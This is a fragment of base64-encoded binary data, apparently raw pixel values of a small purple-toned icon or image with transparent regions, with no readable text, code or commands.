9q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+uaf3/rWn8/69w9f+3idf/wqiS/8OzTf+/sDj/t6Rq/6yLr/+kbt3/omLr/6Ji7P+kY/D/qGX0/6hl9f+nZfT/p2X0/6dl9P+oZfX/qGb2/6lm9/+qZ/j/q2j6/6xo+/+tafz/rmn9/65p/f+uav7/rmr+/65q/v+vav7/pmf+/2lT/f9XTfr/hlr7/6xp//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+uaf7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//n2H3/3BJ5/9aQOT/Sz3l/0Y96P9KQez/Vkfw/2dO9f97Vvf/j133/6Zl+P+uaf3/r2r//69q//+vav//r2r/ua9q/x0AAAAAAAAAAAAAAAAHABsAXwDEAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Gr2r/Xq9q/+evav//r2r//69q//+vav//rm3//4e57f9e3OD/XNrg/2zK4/+LpOv/oHrx/6dm9P+nZfT/p2X0/6dl9P+nZfT/qGb1/6xo+v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav7/rmr+/61p/P+tbvX/s4Ta/7mel/+3p1D/s6U0/62bZ/+ohbH/qWvx/6xo+/+taPv/rWj8/6xo+/+saPv/rGj7/6xo+/+tafz/rWn8/65p/f+uav7/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q//+raf//hFv//4Vb/v+raf//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+taf3/qmf4/6to+v+uaf7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rWn+/6hm/P+eYfn/jVr2/3dR8/9kTPP/WEv2/1VM+v9eUf3/oGX+/69q//+vav//r2r/+q9q/5ivav8ZAAAAAAAAAAAAAAAAAAAAAAAAAABIAJgAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACsaPsAr2r/P69q/86vav//r2r//69q//+vav//qXz8/5Sl8/9xyub/Vtjf/03Y3f9cy9//gKrn/5yA8P+maPT/p2X0/6hm9v+saPv/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65p/f+raPn/qWb2/6pn+P+tafz/r276/7F+3/+wlJz/rJxS/6mWbv+ucfH/r2r//69q//+vav//r2r+/69q/v+vav7/r2r+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+taf//rWn//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rWj7/6dl8/+mZPL/q2f5/69q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmn//6lo/v+gZP3/kl/9/4ld/v+qaP//r2r//69q/+2vav9or2r/CgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADcAdwBwAOUAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/Ja9q/66vav/7r2r//69q//+vav//r2r//6p4/f+Xm/T/cMPm/0vT3P881dn/Tcvc/3Ww5P+df/H/rWn8/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65p/f+qZ/j/pWTx/6Ni7v+lZPH/qmf4/65q/v+vav//r2r//69t+/+ueeP/rXvc/69r/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6xo+v+kY+//oWHr/6dl8/+uaf3/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav/Ur2r/Sa9q/wEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwCGAHEA5wByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/Da9q/26vav/kr2r//69q//+vav//r2r//69q//+sc/3/m5L2/3K75v9Fztv/LdHW/4Ol6v+va///r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//61p/P+qZ/f/pGPw/59g6P+dX+b/omLt/6pn9/+uav7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmn+/6xo+v+saPv/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+lePj/l33p/5xg5f+iYu3/rGj6/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav/3r2r/pK9q/yUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AHEAcADlAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK9q/zKvav+2r2r/+69q//+vav//r2r//69q//+vav//rW/+/56K9/+Bqer/o4D5/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+qZ/j/pGPv/55f5/+UWuH/hVLf/5te6/+rZ/n/r2r+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6xo+v+nZfP/p2Xz/6pn+P+uav7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//qnL8/2234/9Dx9b/jInj/6lm9v+uav7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r/169q/1avav8HAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACYAVwBsAN4AcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK9q/w2vav9cr2r/169q//6vav//r2r//69q//+vav//r2r//69r//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uaf3/qGb1/59g6f+TWuL/fE/h/1c+3/8/M9v/hVPs/65q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65p/f+nZfT/oWHr/6Jh7P+nZfT/rWn9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65r/v+Nnu7/OtHY/0zI2v+agO//rWn9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r/7a9q/46vav8hAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwBBAGoA2gByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8dr2r/eq9q/+evav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmn9/6dl9f+YXez/e1Hp/1hD5/9EOuT/Rjni/2ZF5f+ZXvX/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+raPr/omLs/55f3/+dXuX/pmTy/61p/f+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//oYT3/1fL3v8+0tn/hpzn/6tp+v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r/9q9q/7Cvav8zr2r/AwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAEEAagDaAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Cr2r/LK9q/5ivav/nr2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//61p/f+eYvj/flb0/1xK8f9LQu7/UEHr/29M7f+XXvb/qmj9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uaf3/p2Xz/6Jg4f+1Z8H/xG+u/65n6P+uaf7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6ty/P90vOb/Qtfa/2264f+mcPX/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r/9q9q/7ivav9Hr2r/CQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAQQBqANoAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/Aq9q/yuvav+Wr2r/5q9q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//kF/+/2FQ+/9TSvj/Wkr1/3hT9f+cYfr/rGj+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rWn8/6Rj7v+oYNL/wmmp/89xk//Pc53/um7l/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+ua/7/kaDw/1HW3f9czd//nYTz/65p/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r/9a9q/7evav9Gr2r/CQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwBBAGoA2gByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK9q/wKvav8pr2r/c69q/9avav/6r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+VYf//Z1P9/4FZ/P+gZP3/rWn//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6xo+/+oY+n/tWC+/8hllP/Oa47/yW6t/7pt5P+wav3/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6OG+P9nz+L/V9jf/5Ch8P+ua/7/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav/+r2r/6K9q/5+vav8/r2r/CQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAEoAawDbAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/F69q/1Kvav+yr2r/7a9q//+vav//r2r//69q//+vav//r2r//61p//+nZ///rmr//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+taPr/r2He/79ao//IXYT/yWOR/8Fpx/+zavX/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+sc/3/f7/p/1rb3/99v+r/rHP9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav/3r2r/y69q/3evav8mr2r/AgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoAXgBtAOAAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK9q/wavav8tr2r/bK9q/8Cvav/tr2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//sGj4/7haxf/CUYj/xlR9/8NdpP+3Z+P/sGr9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6WG+v9s1OT/bdLk/6SI+v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//evav/Sr2r/k69q/0Cvav8QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgB0AHAA5QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/Ca9q/yyvav9qr2r/v69q/+qvav/9r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+0YuT/wEh8/8JOhP+8XcT/smj1/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rm3//5+T+P+flff/r2v//69q//+vav//r2r//69q//+vav/+r2r/869q/9Gvav+Sr2r/P69q/xGlZPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABHAJYAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Ir2r/Ja9q/1Cvav+cr2r/0q9q/+6vav/9r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//7Bo+v+4Wsv/tWLj/7Bp/f+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//q9q//Kvav/er2r/sq9q/2Kvav8yr2r/EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAMAFgAtgByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK9q/wGvav8Pr2r/KK9q/0+vav+Qr2r/uq9q/9uvav/xr2r//q9q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//q9q//avav/lr2r/x69q/56vav9gr2r/Mq9q/xevav8FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASADEAYwDNAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Gr2r/Fa9q/y6vav9Qr2r/hK9q/5yvav/Dr2r/069q/+2vav/vr2r//K9q//6vav/+r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav/+r2r//q9q//6vav/xr2r/769q/9yvav/Lr2r/pq9q/5Gvav9Yr2r/Oq9q/x2vav8JAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEATABqANoAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK9q/wmvav8Or2r/JK9q/yivav9Jr2r/Uq9q/1Wvav+Nr2r/ma9q/5mvav+Yr2r/mK9q/5ivav+Yr2r/mK9q/5ivav+Yr2r/mK9q/5ivav+Yr2r/lq9q/1+vav9Sr2r/UK9q/y+vav8lr2r/Fq9q/wmvav8BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQACIAHEA5wByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAMwBiAMsAcgDpAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANwB4AHAA5AByAOkAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGAJQAcgDpAHIA6QByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsAfgBwAOYAcgDpAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAA8AGcA0wByAOkAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAEsAaADVAHIA6QByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA